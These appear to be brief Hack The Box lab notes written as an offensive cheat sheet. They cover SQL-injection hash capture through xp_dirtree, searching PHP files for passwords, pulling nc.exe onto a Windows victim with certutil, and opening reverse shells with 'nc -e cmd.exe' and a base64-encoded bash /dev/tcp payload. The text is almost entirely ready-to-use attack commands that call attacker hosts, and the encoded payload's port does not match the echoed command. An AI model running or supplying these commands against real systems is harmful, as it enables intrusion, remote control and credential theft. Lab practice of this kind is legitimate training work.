General Tips

Getting a reverse shell via sql injection to capture password hash - https://0xrick.github.io/hack-the-box/giddy/

EXEC MASTER.sys.xp_dirtree '\10.10.14.209\fakeshare

There are many ways to phrase password - ensure you check spelling

find . -name "*.php" -print0 | xargs -0 grep -i -n "passwd"

Transferring Files to Windows Via Windows Command Execution

On Attacker PC host payload on simple webserver

Hosting NC.exe on Attacker PC

Next download the file on to the victims PC via RCE using certutil.

python exploit.py -u "admin@htb.local" -p "baconandchesse" -i "http://10.10.10.180" -c powershell.exe -a "/c certutil -urlcache -split -f http://10.10.14.34:8000/nc.exe c:/windows/temp/nc.exe"

RCE on Windows Host

Log on Attcker PC Showing File Successfully Downloaded

Next setup a listener on the attacker PC

NC Listener on port 8090

Next on the victim PC, launch the newly downloaded nc.exe and connect back to the attacker PC.

python exploit.py -u "admin@htb.local" -p "baconandchesse" -i "http://10.10.10.180" -c powershell.exe -a "/c c:/windows/temp/nc.exe 10.10.14.34 8090 -e cmd.exe"

Called NC.exe

Successfully gained reverse shell

RCE Payload Workarounds:

java.lang.Runtime.exec:

// RCE COMMAND
johnd@kali:~/HackTheBox$ echo 'bash -i >& /dev/tcp/10.10.14.14/8899 0>&1' | base64 
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNC84ODk5IDA+JjEK

// PAYLOAD
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNC84ODg4IDA+JjEK=}|{base64,-d}|{bash,-i}